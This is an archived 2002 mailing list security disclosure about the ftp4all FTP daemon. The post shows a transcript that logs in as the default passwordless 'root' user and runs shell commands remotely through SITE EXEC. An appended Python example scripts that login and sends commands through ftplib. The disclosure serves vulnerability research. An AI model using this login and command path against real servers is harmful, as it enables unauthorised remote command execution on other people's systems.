Vulnerability Development mailing list archives

Retarded *feature* in ftp4all


From: KF <dotslash () snosoft com>
Date: Thu, 03 Jan 2002 13:24:16 -0500

Here is some info on a feature of ftp4all that could lead to a security issue.


Here's the latest version of ftp4all that I can find... version 3.012.
This program is OLD and looks unmaintained; it's also got overflows, so
I wouldn't use it.
* http://www.ftp4all.de/v3/CHANGES
VERSION HISTORY ===== Version 3.012 (04 ... Bugfix: Possible buffer overflow
in user ... for that (printf formattable). | `= Version ...

Q: What is FTP4ALL ?
A: FTP4ALL is a ftp daemon for unix systems. It runs under any normal user account and doesn't
require any special rights to start. It has its own permission and user handling, and is mainly
independent from the operating system it runs under (although it inherits any limitations of the
user account under which it is running).

Q: Why should I use FTP4ALL, if there is <any ftp daemon> ?
A: First, every other ftp daemon I know needs special privileges to run it. Then, there are
system-integrated daemons which are used to access your shell accounts with the FTP protocol.
FTP4ALL is different: you can generally run FTP4ALL from any account, without root access, with no
power hit as compared with other advanced ftpdaemons.

Here is a nice *feature* I have found in ftp4all.

EXEC *
Syntax : exec <command> [<arguments>]
Example: exec ls -al
This executes a command on the server. The result is sent back over the control connection, i.e.
you get a sequence of 200- lines. When the command finishes, the exit code is displayed. You can
not run interactive commands such as a shell.

Example usage of the *feature*:
sh-2.05$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)
sh-2.05$ /home/ftp/my_site/sbin/ftpd
FTP4ALL 3.012, Copyright (C) 1996-2000 by Crescent (crescent () ftp4all de)
This program is FREE SOFTWARE and distributed under GNU PUBLIC LICENSE
Server on host linuxppc.insight.rr.com is ready and listening on *:2000
Base directory : /home/ftp/my_site
Readme file    : (none)
Permission file: .permissions
Errlog file    : log/ftpd.err
Log file       : log/ftpd.log
Log program    : (none)
Server program : /home/ftp/my_site/sbin/ftps

Joe Schmoe uses my server and knows the default user is root with no password.
sh-2.05$ ftp kf.ftp4all.boxen  2000
Connected to kf.ftp4all.boxen
220 FTP4ALL Server 3.012 (05/Mar/2000) ready.
Name (localhost:nobody): root
331 Password required for root.
Password: <default no passwd>
230 User root logged in.
Remote system type is UNIX.
Using binary mode to transfer files.

Let's use the built-in w command to see who's logged in to ftpd.
ftp> site w
211- NR HANDLE    GROUP     ON-TM AC-TM MUP/MDN ACTIVITY / (LAST ACTIVITY)
211- 01·root      0         00:01 00:00   0/  0 (LOGIN)
211  FTP4ALL v3.012         HH:MM MM:SS ON-TM=ONLINE TIME / AC-TM=ACTIVITY TIME

Let's try it another way ... this looks like w output from a shell.
ftp> site exec w
200-  6:16pm  up 14:32,  2 users,  load average: 0.00, 0.02, 0.04
200-USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
200-root     tty1     -                 3:47am 14:28m  3.22s  0.07s  xinit /etc/X11/
200-root     pts/0    -                 3:48am 14:28m  0.03s  0.03s  /bin/cat
200 EXEC finished with exitcode 0.

Let's check to make sure.
ftp> ls ../../../../
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
226 Directory listing completed.
 nothing here

Yes, this is definitely output from a shell.
ftp> site exec ls ../../../../
200-bin
200-boot
200-dev
200-etc
200-home
200-lib
200-lost+found
200-mnt
200-opt
200-proc
200-root
200-sbin
200-tmp
200-usr
200-var
200 EXEC finished with exitcode 0.
ftp>

So obviously you run commands as whoever this program was run as. The company suggests a non-priv
user like nobody. But if you are dumb you may have run this as root. Have fun.
ftp> site exec id
200-uid=99(nobody) gid=99(nobody) groups=99(nobody)
200 EXEC finished with exitcode 0.

-KF
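The exchange shown in the post (a SITE EXEC request answered by a run of "200-" continuation lines and a final "200 EXEC finished with exitcode N." line) is ordinary RFC 959 multi-line reply syntax, so a stock FTP client library can drive it. The following is an added example, not code from the post or from the ftp4all project: it parses such a reply into the command's output and exit code, and wraps Python's ftplib to send the command. The host, port, user, password and command arguments of site_exec() are placeholders the caller supplies; the embedded sample replies are copied from the transcript above and are labelled as constructed test data.

```python
"""Client-side handling of FTP4ALL's SITE EXEC reply format (added example)."""
import re
from ftplib import FTP

# Final line of a SITE EXEC reply, as seen in the post:
# "200 EXEC finished with exitcode 0."
EXIT_RE = re.compile(r"^EXEC finished with exitcode (\d+)\.?$")


def parse_multiline_reply(reply: str):
    """Split an RFC 959 multi-line reply into (code, body_lines, final_text).

    `reply` is the raw text a client receives (e.g. from ftplib's sendcmd()):
    zero or more "NNN-text" continuation lines, then one "NNN text" line.
    Raises ValueError when the terminal line is missing or out of place.
    """
    lines = reply.splitlines()
    if not lines or not re.match(r"^\d{3}[- ]", lines[0] + " "):
        raise ValueError(f"malformed reply start: {lines[:1]!r}")
    code = lines[0][:3]
    body = []
    for i, line in enumerate(lines):
        if not line.startswith(code):
            # RFC 959 allows continuation text without a code prefix.
            body.append(line)
            continue
        sep, text = line[3:4], line[4:]
        if sep == "-":
            body.append(text)
        elif sep in (" ", ""):
            if i != len(lines) - 1:
                raise ValueError("terminal line before end of reply")
            return code, body, text
        else:
            raise ValueError(f"unexpected separator in {line!r}")
    raise ValueError("no terminal line in reply")


def parse_site_exec_reply(reply: str):
    """Return (exit_code, output_lines) for a SITE EXEC reply."""
    code, body, final = parse_multiline_reply(reply)
    if code != "200":
        raise RuntimeError(f"SITE EXEC not accepted: {code} {final}")
    m = EXIT_RE.match(final)
    if not m:
        raise ValueError(f"unexpected final line: {final!r}")
    return int(m.group(1)), body


def site_exec(host, port, user, password, command, timeout=10):
    """Log in and run `command` through SITE EXEC (placeholder credentials).

    ftplib's sendcmd() returns the whole multi-line reply as one string and
    raises ftplib.error_perm on a 5xx refusal.
    """
    with FTP() as ftp:
        ftp.connect(host, port, timeout=timeout)
        ftp.login(user, password)
        reply = ftp.sendcmd(f"SITE EXEC {command}")
    return parse_site_exec_reply(reply)


# Constructed sample replies, copied from the transcript in the post.
SAMPLE_ID_REPLY = (
    "200-uid=99(nobody) gid=99(nobody) groups=99(nobody)\n"
    "200 EXEC finished with exitcode 0."
)
SAMPLE_W_REPLY = (
    "200-  6:16pm  up 14:32,  2 users,  load average: 0.00, 0.02, 0.04\n"
    "200-USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT\n"
    "200-root     tty1     -                 3:47am 14:28m  3.22s  0.07s  xinit /etc/X11/\n"
    "200-root     pts/0    -                 3:48am 14:28m  0.03s  0.03s  /bin/cat\n"
    "200 EXEC finished with exitcode 0."
)


def demo():
    """Parse the two sample replies without touching the network."""
    return parse_site_exec_reply(SAMPLE_ID_REPLY), parse_site_exec_reply(SAMPLE_W_REPLY)


if __name__ == "__main__":
    for exit_code, output in demo():
        print("\n".join(output))
        print(f"exit code {exit_code}")
```

The parser treats the reply code as the framing token, as ftplib itself does, so any server that follows the 200-/200 convention is handled; a reply whose terminal line does not carry the exitcode text is rejected rather than guessed at.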




